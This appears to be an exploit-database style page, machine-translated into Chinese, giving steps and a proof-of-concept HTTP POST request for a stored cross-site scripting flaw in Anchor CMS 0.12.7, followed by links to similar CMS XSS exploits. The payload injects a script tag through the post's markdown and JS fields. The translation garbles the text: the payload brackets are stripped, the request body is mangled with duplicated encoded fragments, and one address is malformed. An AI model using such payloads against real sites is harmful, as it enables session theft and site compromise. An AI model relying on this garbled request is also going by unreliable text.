锚CMS 0.12.7-存储的跨站点脚本（XSS）

HackApt-37 Team · 04 9, 2025

＃利用标题:锚CMS 0.12.7-存储的跨站点脚本（XSS）
＃日期: 04/28/2024
＃利用作者: ahmetümitBayram
＃供应商HomePage3360 https://anchorcms.com/
＃软件link:

正在加载...

github.com

＃版本:最新
＃在: MacOS上测试
＃登录到锚定CMS。
＃单击“创建新帖子”。
＃填写“标题”并在现场输入以下有效载荷
紧接:
＃'scriptalert（）/脚本
＃转到主页，您将看到警报！
### POC请求###
POST/ANDANOR/ADMIN/POST/EDIT/2 HTTP/1.1
HOST: 127.0.0.1
用户代理: Mozilla/5.0（Macintosh; Intel Mac OS X 10.15; RV:124.0）
壁虎/20100101 Firefox/124.0
ACCEPT: /
Accept-Language: TR-TR，TR; Q=0.8，EN-US; Q=0.5，en; q=0.3
Accept-incoding: Gzip，Deflate，br
X-重新要求- WITH: XMLHTTPREQUEST
content-type:应用程序/x-www-form-urlenceded
内容长度: 278
Origin: http://127.0.0.1
连接:关闭
Referer: http://127.0.0.0.1/anchor/admin/posts/edit/2
cookie: phpsessID=8D8APA3KO6ALT5T6JKO2E0MRTA;
anchorcms=hlko7b1dbdpjgn58himf2obht5
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
token=oqyplxkqyav5kqymbserncqjifcougs9gza3y3zpnshdgb8il8l8l8l8vh3kiofikso9kftitle=testmarkDown=％22％22％3E％3E％3CScript％3CScript％3CEALERT（）3C％2fscript％3C％2fscript％3eslug=AAAACREATED=2024-04-28+12％3A20％3A36DESCRIPTION=status=statusedCategory=1CSSS=1CSS=JS=％22％3E％3CScript％3CScript％3CEALERT（）％3C％3C％2fScript％3AeutoSave=false

H	WBCE CMS 1.6.1-多个存储的跨站点脚本（XSS） HackApt-37 Team 04 9, 2025 POC/?Day
H	Monstra 3.0.4-存储的跨站点脚本（XSS） HackApt-37 Team 04 9, 2025 POC/?Day
H	TextPattern CMS v4.8.8-存储的跨站点脚本（XSS）（认证） HackApt-37 Team 04 9, 2025 POC/?Day
H	Xoops CMS 2.5.10-存储的跨站点脚本（XSS）（认证） HackApt-37 Team 04 9, 2025 POC/?Day
H	居民2.10.1-存储的跨站点脚本（XSS） HackApt-37 Team 04 9, 2025 POC/?Day